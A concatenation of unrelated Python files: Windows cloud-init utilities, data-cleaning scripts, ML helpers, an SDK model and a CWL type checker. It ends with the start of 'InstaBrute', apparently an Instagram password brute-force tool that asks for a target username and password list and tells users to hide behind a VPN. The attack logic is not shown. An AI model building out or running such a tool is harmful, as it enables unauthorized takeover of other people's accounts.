raise exception.CloudbaseInitException(
"RtlVerifyVersionInfo failed with error: %s" % ret_val)
def get_volume_label(self, drive):
max_label_size = 261
label = ctypes.create_unicode_buffer(max_label_size)
ret_val = kernel32.GetVolumeInformationW(six.text_type(drive), label,
max_label_size, 0, 0, 0, 0, 0)
if ret_val:
return label.value
def get_volume_path_names_by_mount_point(self, mount_point):
max_volume_name_len = 50
volume_name = ctypes.create_unicode_buffer(max_volume_name_len)
if not kernel32.GetVolumeNameForVolumeMountPointW(
six.text_type(mount_point), volume_name,
max_volume_name_len):
if kernel32.GetLastError() in [self.ERROR_INVALID_NAME,
self.ERROR_PATH_NOT_FOUND]:
raise exception.ItemNotFoundException(
"Mount point not found: %s" % mount_point)
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get volume name for mount point: %s. "
"Error: %%r" % mount_point)
volume_path_names_len = wintypes.DWORD(100)
while True:
volume_path_names = ctypes.create_unicode_buffer(
volume_path_names_len.value)
if not kernel32.GetVolumePathNamesForVolumeNameW(
volume_name, volume_path_names, volume_path_names_len,
ctypes.byref(volume_path_names_len)):
if kernel32.GetLastError() == self.ERROR_MORE_DATA:
continue
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get path names for volume name: %s."
"Error: %%r" % volume_name.value)
return [n for n in volume_path_names[
:volume_path_names_len.value - 1].split('\0') if n]
def generate_random_password(self, length):
if length < 3:
raise exception.CloudbaseInitException(
"Password can not have less than 3 characters!")
while True:
pwd = super(WindowsUtils, self).generate_random_password(length)
# Make sure that the Windows complexity requirements are met:
# http://technet.microsoft.com/en-us/library/cc786468(v=ws.10).aspx
valid = True
for r in ["[a-z]", "[A-Z]", "[0-9]"]:
if not re.search(r, pwd):
valid = False
if valid:
return pwd
def _split_str_buf_list(self, buf, buf_len):
i = 0
value = ''
values = []
while i < buf_len:
c = buf[i]
if c != '\x00':
value += c
else:
values.append(value)
value = ''
i += 1
return values
def get_logical_drives(self):
buf_size = self.MAX_PATH
buf = ctypes.create_unicode_buffer(buf_size + 1)
buf_len = kernel32.GetLogicalDriveStringsW(buf_size, buf)
if not buf_len:
raise exception.WindowsCloudbaseInitException(
"GetLogicalDriveStringsW failed: %r")
return self._split_str_buf_list(buf, buf_len)
def get_cdrom_drives(self):
drives = self.get_logical_drives()
return [d for d in drives if kernel32.GetDriveTypeW(d) ==
self.DRIVE_CDROM]
def _is_64bit_arch(self):
# interpreter's bits
return struct.calcsize("P") == 8
def get_physical_disks(self):
physical_disks = []
disk_guid = GUID_DEVINTERFACE_DISK
handle_disks = setupapi.SetupDiGetClassDevsW(
ctypes.byref(disk_guid), None, None,
self.DIGCF_PRESENT | self.DIGCF_DEVICEINTERFACE)
if handle_disks == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
"SetupDiGetClassDevs failed")
try:
did = Win32_SP_DEVICE_INTERFACE_DATA()
did.cbSize = ctypes.sizeof(Win32_SP_DEVICE_INTERFACE_DATA)
index = 0
while setupapi.SetupDiEnumDeviceInterfaces(
handle_disks, None, ctypes.byref(disk_guid), index,
ctypes.byref(did)):
index += 1
handle_disk = self.INVALID_HANDLE_VALUE
required_size = wintypes.DWORD()
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), None, 0,
ctypes.byref(required_size), None):
if (kernel32.GetLastError() !=
self.ERROR_INSUFFICIENT_BUFFER):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
pdidd = ctypes.cast(
msvcrt.malloc(ctypes.c_size_t(required_size.value)),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W))
try:
pdidd.contents.cbSize = ctypes.sizeof(
Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W)
if not self._is_64bit_arch():
# NOTE(cpoieana): For some reason, on x86 platforms
# the alignment or content of the struct
# is not taken into consideration.
pdidd.contents.cbSize = 6
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), pdidd,
required_size, None, None):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
device_path = ctypes.cast(
pdidd.contents.DevicePath, wintypes.LPWSTR).value
handle_disk = kernel32.CreateFileW(
device_path, 0, self.FILE_SHARE_READ,
None, self.OPEN_EXISTING, 0, 0)
if handle_disk == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
'CreateFileW failed')
sdn = Win32_STORAGE_DEVICE_NUMBER()
b = wintypes.DWORD()
if not kernel32.DeviceIoControl(
handle_disk, self.IOCTL_STORAGE_GET_DEVICE_NUMBER,
None, 0, ctypes.byref(sdn), ctypes.sizeof(sdn),
ctypes.byref(b), None):
raise exception.WindowsCloudbaseInitException(
'DeviceIoControl failed: %r')
physical_disks.append(
r"\\.\PHYSICALDRIVE%d" % sdn.DeviceNumber)
finally:
msvcrt.free(pdidd)
if handle_disk != self.INVALID_HANDLE_VALUE:
kernel32.CloseHandle(handle_disk)
finally:
setupapi.SetupDiDestroyDeviceInfoList(handle_disks)
return physical_disks
def get_volumes(self):
"""Retrieve a list with all the volumes found on all disks."""
volumes = []
volume = ctypes.create_unicode_buffer(chr(0) * self.MAX_PATH)
handle_volumes = kernel32.FindFirstVolumeW(volume, self.MAX_PATH)
if handle_volumes == self.INVALID_HANDLE_VALUE:
raise exception.WindowsCloudbaseInitException(
"FindFirstVolumeW failed: %r")
try:
while True:
volumes.append(volume.value)
found = kernel32.FindNextVolumeW(handle_volumes, volume,
self.MAX_PATH)
if not found:
errno = ctypes.GetLastError()
if errno == self.ERROR_NO_MORE_FILES:
break
else:
raise exception.WindowsCloudbaseInitException(
"FindNextVolumeW failed: %r")
finally:
kernel32.FindVolumeClose(handle_volumes)
return volumes
def _get_fw_protocol(self, protocol):
if protocol == self.PROTOCOL_TCP:
fw_protocol = self._FW_IP_PROTOCOL_TCP
elif protocol == self.PROTOCOL_UDP:
fw_protocol = self._FW_IP_PROTOCOL_UDP
else:
raise NotImplementedError("Unsupported protocol")
return fw_protocol
def firewall_create_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_port = client.Dispatch("HNetCfg.FWOpenPort")
fw_port.Name = name
fw_port.Protocol = self._get_fw_protocol(protocol)
fw_port.Port = port
fw_port.Scope = self._FW_SCOPE_ALL
fw_port.Enabled = True
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_profile = fw_profile.GloballyOpenPorts.Add(fw_port)
def firewall_remove_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_protocol = self._get_fw_protocol(protocol)
fw_profile = fw_profile.GloballyOpenPorts.Remove(port, fw_protocol)
def is_wow64(self):
return win32process.IsWow64Process()
def get_system32_dir(self):
return os.path.expandvars('%windir%\\system32')
def get_syswow64_dir(self):
return os.path.expandvars('%windir%\\syswow64')
def get_sysnative_dir(self):
return os.path.expandvars('%windir%\\sysnative')
def check_sysnative_dir_exists(self):
sysnative_dir_exists = os.path.isdir(self.get_sysnative_dir())
if not sysnative_dir_exists and self.is_wow64():
LOG.warning('Unable to validate sysnative folder presence. '
'If Target OS is Server 2003 x64, please ensure '
'you have KB942589 installed')
return sysnative_dir_exists
def _get_system_dir(self, sysnative=True):
"""Return Windows system directory with compatibility support.
Depending on the interpreter bits and platform architecture,
the return value may vary between
C:\Windows\(System32|SysWOW64|Sysnative).
Note that "Sysnative" is just an alias (doesn't really exist on disk).
More info about this can be found in documentation.
"""
if sysnative and self.check_sysnative_dir_exists():
return self.get_sysnative_dir()
if not sysnative and self._is_64bit_arch():
return self.get_syswow64_dir()
return self.get_system32_dir()
def is_nano_server(self):
return self._check_server_level("NanoServer")
def _check_server_level(self, server_level):
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows NT\\CurrentVersion\\Server\\"
"ServerLevels") as key:
return winreg.QueryValueEx(key, server_level)[0] == 1
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def execute_powershell_script(self, script_path, sysnative=True):
base_dir = self._get_system_dir(sysnative)
powershell_path = os.path.join(base_dir,
'WindowsPowerShell\\v1.0\\'
'powershell.exe')
args = [powershell_path]
if not self.is_nano_server():
args += ['-ExecutionPolicy', 'RemoteSigned', '-NonInteractive',
'-File']
args.append(script_path)
return self.execute_process(args, shell=False)
def execute_system32_process(self, args, shell=True, decode_output=False,
sysnative=True):
base_dir = self._get_system_dir(sysnative)
process_path = os.path.join(base_dir, args[0])
return self.execute_process([process_path] + args[1:],
decode_output=decode_output, shell=shell)
def get_maximum_password_length(self):
return 20
def set_timezone(self, timezone_name):
windows_name = windows_tz.tz_win.get(timezone_name)
if not windows_name:
raise exception.CloudbaseInitException(
"The given timezone name is unrecognised: %r" % timezone_name)
timezone.Timezone(windows_name).set(self)
def is_real_time_clock_utc(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation') as key:
try:
utc = winreg.QueryValueEx(key, 'RealTimeIsUniversal')[0]
return utc != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
raise
def set_real_time_clock_utc(self, utc):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'RealTimeIsUniversal', 0,
winreg.REG_DWORD, 1 if utc else 0)
def get_page_files(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management') as key:
values = winreg.QueryValueEx(key, 'PagingFiles')[0]
page_files = []
for value in values:
v = value.split(" ")
path = v[0]
min_size_mb = int(v[1]) if len(v) > 1 else 0
max_size_mb = int(v[2]) if len(v) > 2 else 0
page_files.append((path, min_size_mb, max_size_mb))
return page_files
def set_page_files(self, page_files):
values = []
for path, min_size_mb, max_size_mb in page_files:
values.append("%s %d %d" % (path, min_size_mb, max_size_mb))
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'PagingFiles', 0,
winreg.REG_MULTI_SZ, values)
def enable_trim(self, enable):
"""Enables or disables TRIM delete notifications."""
args = ["fsutil.exe", "behavior", "set", "disabledeletenotify",
"0" if enable else "1"]
(out, err, ret_val) = self.execute_system32_process(args)
if ret_val:
raise exception.CloudbaseInitException(
'TRIM configurating failed.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def set_path_admin_acls(self, path):
LOG.debug("Assigning admin ACLs on path: %s", path)
# Sets ACLs for "NT AUTHORITY\SYSTEM" and "BUILTIN\Administrators"
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"icacls.exe", path, "/inheritance:r", "/grant:r",
"*S-1-5-18:(OI)(CI)F", "*S-1-5-32-544:(OI)(CI)F"])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to set path ACLs.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def take_path_ownership(self, path, username=None):
if username:
raise NotImplementedError()
LOG.debug("Taking ownership of path: %s", path)
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"takeown.exe", "/F", path])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to take path ownership.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def check_dotnet_is_installed(self, version):
# See: https://msdn.microsoft.com/en-us/library/hh925568(v=vs.110).aspx
if str(version) != "4":
raise exception.CloudbaseInitException(
"Only checking for version 4 is supported at the moment")
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\NET Framework Setup\\NDP\\'
'v%s\\Full' % version) as key:
return winreg.QueryValueEx(key, 'Install')[0] != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def get_file_version(self, path):
info = win32api.GetFileVersionInfo(path, '\\')
ms = info['FileVersionMS']
ls = info['FileVersionLS']
return (win32api.HIWORD(ms), win32api.LOWORD(ms),
win32api.HIWORD(ls), win32api.LOWORD(ls))
def get_default_script_exec_header(self):
return constant.SCRIPT_HEADER_CMD
|
from .core import *
from .usual_models import *
|
import pandas as pd
import re
data = pd.read_csv("BIPMetadata_current.csv")
def format_date(date_column):
# formatting the date data to display as yyyy-mm-dd
new_dates = []
for date in date_column:
month = date[0:date.find('/')]
date = date[date.find('/')+1:]
day = date[0:date.find('/')]
year = date[date.find('/')+1:]
if (len(month) == 1):
month = "0" + month
if (len(day) == 1):
day = "0" + day
if (len(year) == 2):
year = "20" + year
newDate = year + "-" + month + "-" + day
print(newDate)
new_dates.append(newDate)
return new_dates
def truncate(column, length):
# truncates given column to given length and returns new column
new_d = []
for d in column:
if (len(d) > length):
d = d[0:length]
new_d.append(d)
return new_d
# source: https://stackoverflow.com/questions/9662346/python-code-to-remove-html-tags-from-a-string
def cleanhtml(column):
new_desc = []
for d in column:
cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')
cleantext = re.sub(cleanr, '', d)
new_desc.append(' '.join(cleantext.split()))
return new_desc
def remove_spaces(column):
new_sql = []
for d in column:
new_sql.append(' '.join(d.split()))
return new_sql
new_created = format_date(data["created"])
print("UPDATAED")
new_updated = format_date(data["updated"])
new_query = remove_spaces(data["sql_query"])
new_query = truncate(new_query, 5000)
new_description = truncate(data["description"], 500)
new_description = cleanhtml(new_description)
data["created"] = new_created
data["updated"] = new_updated
data["sql_query"] = new_query
data["description"] = new_description
data.to_csv("BIPMetadata_cleaned.csv", index=False)
|
import os
from wellcomeml.ml.clustering import TextClustering
from wellcomeml.viz.visualize_clusters import visualize_clusters
def test_output_html(tmp_path):
"""Tests that the output html is generated correclty by the clustering function"""
# This will be the file to
temporary_file = os.path.join(tmp_path, 'test-cluster.html')
# Run clustering on small dummy data (see test_clustering.py)
cluster = TextClustering(embedding_random_state=42,
reducer_random_state=43,
clustering_random_state=44)
X = ['Wellcome Trust',
'The Wellcome Trust',
'Sir Henry Wellcome',
'Francis Crick',
'Crick Institute',
'Francis Harry Crick']
cluster.fit(X)
# Run the visualisation function with output_file=temporary_file
visualize_clusters(clustering=cluster, output_file_path=temporary_file, radius=0.01,
alpha=0.5, output_in_notebook=False)
# Assert that the html was generated correctly
assert os.path.exists(temporary_file)
|
#!/usr/bin/env python
import numpy as np
from collections import defaultdict
import itertools
from sklearn.metrics import confusion_matrix
def print_data_stats(sens_attr, class_labels):
"""Print a few numbers about the data: Total number of points, number of
protected examples and unprotected examples, and number of protected points
in positive class, and number of unprotected points in positive class.
Parameters
-----------
sens_attr: numpy array
The sensitive attribute of shape=(number_points,).
class_labels: nunmp
The class labels of shape=(number_points,).
"""
non_prot_all = sum(sens_attr == 1.0) # non-protected group
prot_all = len(sens_attr) - non_prot_all # protected group
non_prot_pos = sum(class_labels[sens_attr == 1.0] == 1.0) # non_protected in positive class
prot_pos = sum(class_labels == 1.0) - non_prot_pos # protected in positive class
frac_non_prot_pos = float(non_prot_pos) / float(non_prot_all)
frac_prot_pos = float(prot_pos) / float(prot_all)
print
print("Total data points: %d" % len(sens_attr))
print("# non-protected examples: %d" % non_prot_all)
print("# protected examples: %d" % prot_all)
print("# non-protected examples in positive class: %d (%0.1f%%)" % (non_prot_pos, non_prot_pos * 100.0 / non_prot_all))
print("# protected examples in positive class: %d (%0.1f%%)" % (prot_pos, prot_pos * 100.0 / prot_all))
def get_positive_rate(y_predicted, y_true):
"""Compute the positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
pr: float
The positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
pr = (tp+fp) / (tp+fp+tn+fn)
return pr
def get_true_positive_rate(y_predicted, y_true):
"""Compute the true positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
tpr: float
The true positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
tpr = tp / (tp+fn)
return tpr
def compute_fairness_measures(y_predicted, y_true, sens_attr):
"""Compute value of demographic parity and equality of opportunity for given predictions.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
sens_attr: numpy array
The sensitive labels of shape=(number_points,).
Returns
----------
DDP: float
The difference of demographic parity.
DEO: float
The difference of equality of opportunity.
"""
positive_rate_prot = get_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
positive_rate_unprot = get_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
true_positive_rate_prot = get_true_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
true_positive_rate_unprot = get_true_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
DDP = positive_rate_unprot - positive_rate_prot
DEO = true_positive_rate_unprot - true_positive_rate_prot
rates = [positive_rate_unprot, positive_rate_prot]
DP = np.min(rates)/(np.max(rates) + 1e-5)
return DDP, DEO, DP
def get_accuracy(y_true, y_predicted):
"""Compute the accuracy for given predicted class labels.
Parameters
----------
y_true: numpy array
The true class labels of shape=(number_points,).
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
Returns
---------
accuracy: float
The accuracy of the predictions.
"""
correct_answers = (y_predicted == y_true).astype(int) # will have 1 when the prediction and the actual label match
accuracy = float(sum(correct_answers)) / float(len(correct_answers))
return accuracy
|
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_user import DeclarativeUser
from gooddata_metadata_client.model.declarative_users import DeclarativeUsers
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.identifier import CatalogUserGroupIdentifier
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
LAYOUT_USERS_DIR = "users"
LAYOUT_USERS_FILE = "users.yaml"
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUsers(Base):
users: List[CatalogDeclarativeUser]
@staticmethod
def client_class() -> Type[DeclarativeUsers]:
return DeclarativeUsers
@classmethod
def load_from_disk(cls, layout_organization_folder: Path) -> CatalogDeclarativeUsers:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
data = read_layout_from_file(users_file)
users = []
for record in data:
users.append(CatalogDeclarativeUser.from_dict(record, camel_case=True))
return cls(users=users)
def store_to_disk(self, layout_organization_folder: Path) -> None:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
create_directory(users_directory)
users = [user.to_dict(camel_case=True) for user in self.users]
write_layout_to_file(users_file, users)
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUser(Base):
id: str
auth_id: Optional[str] = None
user_groups: List[CatalogUserGroupIdentifier] = []
@staticmethod
def client_class() -> Type[DeclarativeUser]:
return DeclarativeUser
|
import logging
from collections import namedtuple
from typing import (Any, Callable, Dict, # pylint: disable=unused-import
Generator, Iterable, List, Optional, Text, Union, cast)
import schema_salad.validate as validate
from schema_salad.sourceline import SourceLine, bullets, strip_dup_lineno
import six
from .errors import WorkflowException
from .loghandler import _logger
from .process import shortname
from .utils import json_dumps
def _get_type(tp):
# type: (Any) -> Any
if isinstance(tp, dict):
if tp.get("type") not in ("array", "record", "enum"):
return tp["type"]
return tp
def check_types(srctype, sinktype, linkMerge, valueFrom):
# type: (Any, Any, Optional[Text], Optional[Text]) -> Text
"""Check if the source and sink types are "pass", "warning", or "exception".
"""
if valueFrom:
return "pass"
elif not linkMerge:
if can_assign_src_to_sink(srctype, sinktype, strict=True):
return "pass"
elif can_assign_src_to_sink(srctype, sinktype, strict=False):
return "warning"
else:
return "exception"
elif linkMerge == "merge_nested":
return check_types({"items": _get_type(srctype), "type": "array"}, _get_type(sinktype), None, None)
elif linkMerge == "merge_flattened":
return check_types(merge_flatten_type(_get_type(srctype)), _get_type(sinktype), None, None)
else:
raise WorkflowException(u"Unrecognized linkMerge enu_m '%s'" % linkMerge)
def merge_flatten_type(src):
# type: (Any) -> Any
"""Return the merge flattened type of the source type
"""
if isinstance(src, list):
return [merge_flatten_type(t) for t in src]
elif isinstance(src, dict) and src.get("type") == "array":
return src
else:
return {"items": src, "type": "array"}
def can_assign_src_to_sink(src, sink, strict=False): # type: (Any, Any, bool) -> bool
"""Check for identical type specifications, ignoring extra keys like inputBinding.
src: admissible source types
sink: admissible sink types
In non-strict comparison, at least one source type must match one sink type.
In strict comparison, all source types must match at least one sink type.
"""
if src == "Any" or sink == "Any":
return True
if isinstance(src, dict) and isinstance(sink, dict):
if sink.get("not_connected") and strict:
return False
if src["type"] == "array" and sink["type"] == "array":
return can_assign_src_to_sink(src["items"], sink["items"], strict)
elif src["type"] == "record" and sink["type"] == "record":
return _compare_records(src, sink, strict)
elif src["type"] == "File" and sink["type"] == "File":
for sinksf in sink.get("secondaryFiles", []):
if not [1 for srcsf in src.get("secondaryFiles", []) if sinksf == srcsf]:
if strict:
return False
return True
else:
return can_assign_src_to_sink(src["type"], sink["type"], strict)
elif isinstance(src, list):
if strict:
for t in src:
if not can_assign_src_to_sink(t, sink):
return False
return True
else:
for t in src:
if can_assign_src_to_sink(t, sink):
return True
return False
elif isinstance(sink, list):
for t in sink:
if can_assign_src_to_sink(src, t):
return True
return False
else:
return src == sink
def _compare_records(src, sink, strict=False):
# type: (Dict[Text, Any], Dict[Text, Any], bool) -> bool
"""Compare two records, ensuring they have compatible fields.
This handles normalizing record names, which will be relative to workflow
step, so that they can be compared.
"""
def _rec_fields(rec): # type: (Dict[Text, Any]) -> Dict[Text, Any]
out = {}
for field in rec["fields"]:
name = shortname(field["name"])
out[name] = field["type"]
return out
srcfields = _rec_fields(src)
sinkfields = _rec_fields(sink)
for key in six.iterkeys(sinkfields):
if (not can_assign_src_to_sink(
srcfields.get(key, "null"), sinkfields.get(key, "null"), strict)
and sinkfields.get(key) is not None):
_logger.info("Record comparison failure for %s and %s\n"
"Did not match fields for %s: %s and %s" %
(src["name"], sink["name"], key, srcfields.get(key),
sinkfields.get(key)))
return False
return True
def static_checker(workflow_inputs, workflow_outputs, step_inputs, step_outputs, param_to_step):
# type: (List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], Dict[Text, Dict[Text, Any]]) -> None
"""Check if all source and sink types of a workflow are compatible before run time.
"""
# source parameters: workflow_inputs and step_outputs
# sink parameters: step_inputs and workflow_outputs
# make a dictionary of source parameters, indexed by the "id" field
src_parms = workflow_inputs + step_outputs
src_dict = {}
for parm in src_parms:
src_dict[parm["id"]] = parm
step_inputs_val = check_all_types(src_dict, step_inputs, "source")
workflow_outputs_val = check_all_types(src_dict, workflow_outputs, "outputSource")
warnings = step_inputs_val["warning"] + workflow_outputs_val["warning"]
exceptions = step_inputs_val["exception"] + workflow_outputs_val["exception"]
warning_msgs = []
exception_msgs = []
for warning in warnings:
src = warning.src
sink = warning.sink
linkMerge = warning.linkMerge
if sink.get("secondaryFiles") and sorted(sink.get("secondaryFiles",[])) != sorted(src.get("secondaryFiles",[])):
msg1 = "Sink '%s'" % (shortname(sink["id"]))
msg2 = SourceLine(sink.get("_tool_entry", sink), "secondaryFiles").makeError(
"expects secondaryFiles: %s but" % (sink.get("secondaryFiles")))
if "secondaryFiles" in src:
msg3 = SourceLine(src, "secondaryFiles").makeError(
"source '%s' has secondaryFiles %s." % (shortname(src["id"]), src.get("secondaryFiles")))
else:
msg3 = SourceLine(src, "id").makeError(
"source '%s' does not include secondaryFiles." % (shortname(src["id"])))
msg4 = SourceLine(src, "id").makeError("To fix, add secondaryFiles: %s to definition of '%s'." % (sink.get("secondaryFiles"), shortname(src["id"])))
msg = SourceLine(sink).makeError("%s\n%s" % (msg1, bullets([msg2, msg3, msg4], " ")))
elif sink.get("not_connected"):
msg = SourceLine(sink, "type").makeError(
"'%s' is not an input parameter of %s, expected %s"
% (shortname(sink["id"]), param_to_step[sink["id"]]["run"],
", ".join(shortname(s["id"])
for s in param_to_step[sink["id"]]["inputs"]
if not s.get("not_connected"))))
else:
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s may be incompatible"
% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
warning_msgs.append(msg)
for exception in exceptions:
src = exception.src
sink = exception.sink
linkMerge = exception.linkMerge
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s is incompatible"
% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
exception_msgs.append(msg)
for sink in step_inputs:
if ('null' != sink["type"] and 'null' not in sink["type"]
and "source" not in sink and "default" not in sink and "valueFrom" not in sink):
msg = SourceLine(sink).makeError(
"Required parameter '%s' does not have source, default, or valueFrom expression"
% shortname(sink["id"]))
exception_msgs.append(msg)
all_warning_msg = strip_dup_lineno("\n".join(warning_msgs))
all_exception_msg = strip_dup_lineno("\n".join(exception_msgs))
if warnings:
_logger.warning("Workflow checker warning:\n%s" % all_warning_msg)
if exceptions:
raise validate.ValidationException(all_exception_msg)
SrcSink = namedtuple("SrcSink", ["src", "sink", "linkMerge"])
def check_all_types(src_dict, sinks, sourceField):
# type: (Dict[Text, Any], List[Dict[Text, Any]], Text) -> Dict[Text, List[SrcSink]]
# sourceField is either "soure" or "outputSource"
"""Given a list of sinks, check if their types match with the types of their sources.
"""
validation = {"warning": [], "exception": []} # type: Dict[Text, List[SrcSink]]
for sink in sinks:
if sourceField in sink:
valueFrom = sink.get("valueFrom")
if isinstance(sink[sourceField], list):
srcs_of_sink = [src_dict[parm_id] for parm_id in sink[sourceField]]
linkMerge = sink.get("linkMerge", ("merge_nested"
if len(sink[sourceField]) > 1 else None))
else:
parm_id = sink[sourceField]
srcs_of_sink = [src_dict[parm_id]]
linkMerge = None
for src in srcs_of_sink:
check_result = check_types(src, sink, linkMerge, valueFrom)
if check_result == "warning":
validation["warning"].append(SrcSink(src, sink, linkMerge))
elif check_result == "exception":
validation["exception"].append(SrcSink(src, sink, linkMerge))
return validation
|
from isserviceup.services.models.statuspage import StatusPagePlugin
class Loggly(StatusPagePlugin):
name = 'Loggly'
status_url = 'http://status.loggly.com//'
icon_url = '/images/icons/loggly.jpg'
|
import tensorflow as tf
from contextlib import contextmanager
from PIL import Image
from keras import backend as K
from keras.utils.data_utils import OrderedEnqueuer
def heteroscedastic_loss(attention=False,
block_attention_gradient=False,
mode='l2'):
''' Heteroscedastic loss.'''
def het_loss(y_true, y_pred):
y_mean = y_pred[:,:,:,:3]
y_logvar = y_pred[:,:,:,3:]
y_logvar = K.clip(y_logvar, -10, 10)
if mode == 'l2':
euclidian_loss = K.square(y_true/127.5 - y_mean/127.5)
elif mode == 'l1':
euclidian_loss = K.abs(y_true/127.5 - y_mean/127.5)
loss = tf.exp(-y_logvar)*euclidian_loss + y_logvar
loss *= 127.5
if mode == 'l2':
loss *= 127.5
if attention:
attention_mask = K.sigmoid(y_logvar)
if block_attention_gradient:
attention_mask = K.stop_gradient(attention_mask)
loss = attention_mask * loss
return K.mean(loss, axis=-1)
return het_loss
@contextmanager
def concurrent_generator(sequence, num_workers=8, max_queue_size=32, use_multiprocessing=False):
enqueuer = OrderedEnqueuer(sequence, use_multiprocessing=use_multiprocessing)
try:
enqueuer.start(workers=num_workers, max_queue_size=max_queue_size)
yield enqueuer.get()
finally:
enqueuer.stop()
def init_session(gpu_memory_fraction):
K.tensorflow_backend.set_session(tensorflow_session(gpu_memory_fraction=gpu_memory_fraction))
def reset_session(gpu_memory_fraction):
K.clear_session()
init_session(gpu_memory_fraction)
def tensorflow_session(gpu_memory_fraction):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = gpu_memory_fraction
return tf.Session(config=config)
def load_image(path):
img = Image.open(path)
if img.mode != 'RGB':
img = img.convert('RGB')
return img
|
from __future__ import absolute_import
from __future__ import print_function
import requests, sys, threading, time, os, random
from random import randint
from six.moves import input
CheckVersion = str (sys.version)
import re
from datetime import datetime
print ('''
....
%
^
L
"F3 $r
$$$$.e$" .
"$$$$$" "
(insTof by 5) $$$$c /
. $$$$$$$P
."c $$$
.$c3b ..J$$$$$e
4$$$$ .$$$$$$$$$$$$$$c
$$$$b .$$$$$$$$$$$$$$$$r
$$$. .$$$$$$$$$$$$$$$$$$
$$$c .$$$$$$$ "$$$$$$$$$r
Author : Falah
snapchat : flaah999
Management depends on vpn software. Please use it before running the tool
""""""""""""""""""""""""""""""""""""""""""
''')
class InstaBrute (object):
def __init__(self):
try:
user = input ('username : ')
Combo = input ('passList : ')
print ('\n----------------------------')
except:
print (' The tool was arrested exit ')
sys.exit ()
